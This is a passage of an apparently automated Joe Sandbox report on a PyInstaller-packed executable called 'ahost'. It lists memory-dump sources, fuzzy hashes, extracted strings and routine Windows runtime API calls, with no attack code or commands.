                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction ID: 1a99fab6e1f5fd11ff65ec8fe9c775221bb2b1cc97259773eb1a6d0d69708f47
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A217132A1878182E760EF51BC817EAA3A4BB88784F800135FE9D9369DDF3CE5458690
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                              • Instruction ID: 05fed30dbe833381ccbe02d857a0200d849fcf7b0633491a18c86575560cce8f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67214A20E4D20A81FB697B617E5517DD1625F447A8F844734EA3E46ADEFE2CB44183A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction ID: b72d8efe116fff7854f8dfb090243b2208da0b1ae41ccade25083cd16c399444
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58114221A18A4186F7A0AF52BC54329A6B4BB88BF4F444234D96EC77E8DF7CD8548790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E8592
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E85E9
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E8678
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E86E4
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E86F5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E870A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                              • Instruction ID: 856e9de2e189ec67eea4b59b7388828ee85c9f9729d418881b56b6d1d16c882c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB418162F1968242EB34BF11BD406AAA2A4FF88BC4F840175DE6D57BCDDE3CE4018765
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB347
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB37D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3AA
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3BB
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3CC
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3E7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                              • Instruction ID: 91b4b69916f986d88ed171446b9ea7620022922d002332079523abcbcc9a57ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE117C21F8C24A82FB687B216E5013DD1625F447B8FC44335EA3E467DEFE2CA44183A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F91E1B6A), ref: 00007FF7F91E295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                              • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction ID: f0c64376cd51bc286dff7d1150b75cb81ac23d528f8595123487143df65275e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E731C923F1868556F720BB61BC505EAA2A4BF887D4F800131EE6D8379DEF3CE546C650
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                              • Instruction ID: cde9648390806a3dbab9a3a180ee4fc0d4614f09e5cc568622a36302ccc22a9d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01314F72A096828AEB64BF21FC552F9A360FF88788F840135EA5D87A99DF3CD1058751
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7F91E918F,?,00007FF7F91E3C55), ref: 00007FF7F91E2BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7F91E2C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction ID: 43b3f26000dfdfdebc77c898112c2a125ff82fc087ed68cdcf59092c872b7465
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D221A372B08B4182E761AF14FC447AAA364EB88784F800135EE9D976A9DF3CE645C790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7F91E1B99), ref: 00007FF7F91E2760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction ID: 69817d10e92a817c0bf8cdb982e81d33c021419ddd39aa274607591d2fc26bb9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF219132A1878182E720EF50BC807EAA3A4AB88784F800131FE9D8369DDF3CE5458790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction ID: 8acd96ae15b1f5222ef32223886f4f8e04bce91f8c5792a94d5de098dfeb807b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F04F61A0960681FF64AF24AC557799330AF85765F940235D67E865FCDF2CD08887A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: f0e261684316692b658090b94d62b5b04e2c0a62debf1f49f119fefb1cfc9640
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C511BF6AE0CA1301F7D43924DC56375A0646F59370FC40634EBBF862FE8E2CA94941A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB41F
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB43E
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB466
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB477
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB488
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                              • Instruction ID: 6d1cdb180982a9e06e76c52639da7bd5ebea41eadfa6d4c9bc6212ec23e341cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40116320E4960A81FB69BF217E5117DD1665F447B8FC84334DA3E467DEFE2CA44182A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                              • Instruction ID: f73985c7d38c1c6319b02e53264c16cba8546c88ac09617218f9da3c9ea843eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B110A10F8920E81FB697E227C5117D91625F45378FC84734DA3E4A3DAFD2CB84282A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: d32c9600901c4d4e9433a50fa100dcd9001e431977c08f809decedeafcdc8d9d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7919822E0C64D45EB61AE24EC5037DB6B9AB40BD8F844135DB7A473DDEE3CE4058391
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
